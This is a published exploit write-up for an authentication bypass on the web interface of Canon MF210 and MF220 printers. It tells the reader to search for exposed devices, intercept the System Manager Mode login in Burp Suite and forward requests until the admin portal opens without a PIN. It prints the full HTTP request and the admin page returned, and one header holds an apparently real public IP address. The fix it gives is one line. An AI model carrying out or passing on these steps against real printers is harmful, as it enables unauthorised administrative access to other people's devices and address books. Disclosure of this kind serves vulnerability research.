# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ] # Date: [4.6.2018] # Exploit Author: [Huy Kha] # Vendor Homepage: [http://global.canon.com] # Software Link: [ Website ] # Version: MF210 & MF20 Series # Severity: High # Tested on: Mozilla FireFox # Description : An issue was discovered on Canon MF210 & MF220 printers webinterface. It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication. # PoC : Start searching for Canon MF210 & MF220 printers. You can recognize them with the /login.html parameter, but the version is also been displayed on the webinterface. https://imgur.com/a/5ON4HF6 # Example : 1. Go to the following url: http://127.0.0.1/login.html 2. Click on System Manager Mode 3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter. # Request : GET /portal_top.html HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://129.2.52.116/login.html Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC Connection: close Upgrade-Insecure-Requests: 1 # Response : HTTP/1.1 200 OK Expires: Thu, 1 Jan 1998 00:00:00 GMT Content-Type: text/html Content-Length: 6119 Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0 Connection: close Set-Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="content-script-type" content="text/javascript" /> <meta http-equiv="content-style-type" content="text/css" /> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" /> <meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" /> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" /> <link rel="stylesheet" type="text/css" media="all" href="css/ja.css" /> <link rel="stylesheet" type="text/css" media="all" href="css/common.css" /> <link rel="stylesheet" type="text/css" media="all" href="css/portal.css" /> <link rel="stylesheet" type="text/css" media="all" href="css/icons.css" /> <script type="text/javascript" src="js/rui.js"></script> <script language="javascript"> function unloadFunc(e) { } registEvent(window, "unload", unloadFunc); </script> <title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title> </head> <body> <div id="container"> <div id="ruiPotalSet"> <div class="Wrapper"> <div id="portalBranding"> <h1 id="deviceLogo"> <a href="portal_top.html"> <img src="media/branding_logo_imageCLASS.png" /> </a> </h1> <div id="productInformation"> <table> <caption></caption> <colgroup> <col class="ItemNameColumn" /> <col class="ItemValueColumn" /> </colgroup> <tbody> <tr> <th>Device Name:</th> <td>MF220&nbsp;Series </td> </tr> <tr> <th>Product Name:</th> <td>MF220 Series </td> </tr> <tr> <th>Location:</th> <td> </td> </tr> </tbody> </table> </div> </div> <div id="commonTools"> <fieldset id="authTools"> <p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p> </fieldset> </div> </div> <hr /> </div> <div id="applications"> <div id="portalApplicationBranding"> <div class="Wrapper"> <h1 id="applicationLogo"><img src="media/app_icon.png" /><span class="BrandingName">Remote UI: Portal</span></h1> <div id="appTools"> <a href="mailto:"><span class="Name">Mail to System Manager</span></a> </div> </div> </div> <hr /> <div id="applicationContents"> <div class="Wrapper"> <div id="contentsWrapper"> <div id="contents"> <div id="contentHeading_potal"> <h2 class="PageName">Device Info</h2> <div id="contentHeadingTools"> <div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div> <div id="tmpReload"> <a href="javascript:location.reload()"><img src="media/bh_updt.gif" alt="Update" title="Update" /></a> </div> </div> </div> <hr /> <h2>Contents</h2> <div id="quotationModule"> <div class="QuotationModuleHeading"><h3></h3></div> <div class="QuotationModuleElement"> <div id="deviceBasicInformation" class="ContentModule"> <div class="ModuleHeading"><h4>Device Basic Information</h4></div> <div id="deviceStatusModule" class="ModuleElement"> <h5>Device Status</h5> <table class="PropertyListComponent"> <colgroup> <col class="ItemNameColumn" /> <col class="ItemValueColum" /> </colgroup> <tbody> <tr> <th>Printer:</th> <td><span class="StatusIcon"><img src="media/sg_off.gif"/></span> <span class="StatusMessage">Sleep mode.</span> </td> </tr> <tr> <th>Scanner:</th> <td><span class="StatusIcon"><img src="media/sg_off.gif"/></span> <span class="StatusMessage">Sleep mode.</span> </td> </tr> <tr> <th>Fax:</th> <td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span> <span class="StatusMessage">Ready to send or receive faxes.</span> </td> </tr> </tbody> </table> </div> <div id="deviceErrorInfoModule" class="ModuleElement"> <h5>Error Information</h5> <p>No errors.</p> </div> </div> <div id="MaintenanceInfomationModule" class="ContentModule"> <div class="ModuleHeading"><h4>Consumables Information</h4></div> <div id="paperInfomationModule" class="ModuleElement"> <input type="button" class="ButtonEnable" value="Check Consumables Details" onclick="location.href='consumables_check.html'"/> <h5>Paper Information</h5> <table summary="Paper Source, Remaining Paper, Paper Size"> <colgroup> <col class="PaperSourceColumn" /> <col class="RemainColumn" /> <col class="PaperSizeColumn" /> <col class="PaperTypeColumn" /> </colgroup> <thead> <tr> <th>Paper Source</th> <th>Paper Level</th> <th>Paper Size</th> <th>Paper Type</th> </tr> </thead> <tbody> <tr> <th>Multi-Purpose Tray</th> <td>None</td> <td>LTR</td> <td>Plain (16 lb Bond-23 lb Bond)</td> </tr> <tr> <th>Drawer 1</th> <td>OK</td> <td>LTR</td> <td>Plain (16 lb Bond-23 lb Bond)</td> </tr> </tbody> </table> </div> <div id="tonerInfomationModule" class="ModuleElement"> <h5>Cartridge Information</h5> <table> <colgroup> <col class="ItemNameColumn" /> <col class="ItemValueColumn" /> </colgroup> <thead> <tr> <th>Color</th> <th>Level</th> </tr> </thead> <tbody> <tr> <th>Black</th> <td><img src="media/ink_bk06.gif" alt="" title="" />60%</td> </tr> </tbody> </table> </div> </div> <div id="linkInformationModule" class="ContentModule"> <div class="ModuleHeading"><h4>Support Link</h4></div> <div class="ModuleElement"> <table class="PropertyListComponent"> <colgroup> <col class="ItemNameColumn" /> <col class="ItemValueColumn" /> </colgroup> <tbody> <tr> <th>Support Link:</th> <td></td> </tr> </tbody> </table> </div> </div> </div> </div> </div> </div> <hr /> <div id="navigationWrapper"> <div id="navigation"> <h2>menu</h2> <div id="navStandard"> <h3 class="GroupTitle">Standard Tool</h3> <ul> <li class="Main"> <a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status Monitor/Cancel</span></a> </li> <li class="Main"> <a href="p_paper.html" class="Standby UsermodeMain"><span class="Name">Settings/Registration</span></a> </li> </ul> </div> <div id="navGeneral"> <ul> <li class="Main"> <a href="a_addresslistone.html" class="Standby AddressMain"> <span class="Name">Address Book</span></a> </li> </ul> </div> </div> </div> </div> </div> </div> <hr /> <div id="applicationInfo"> <address class="SiteInforLegal">Copyright CANON INC. 2014</address> </div> </div> </div> </body> </html> # Do we have now access to the printer with System Manager Mode? : Yes # Screenshot : https://imgur.com/a/U6oBYNV # How to fix this? : Remove the default password and add a new (strong) password.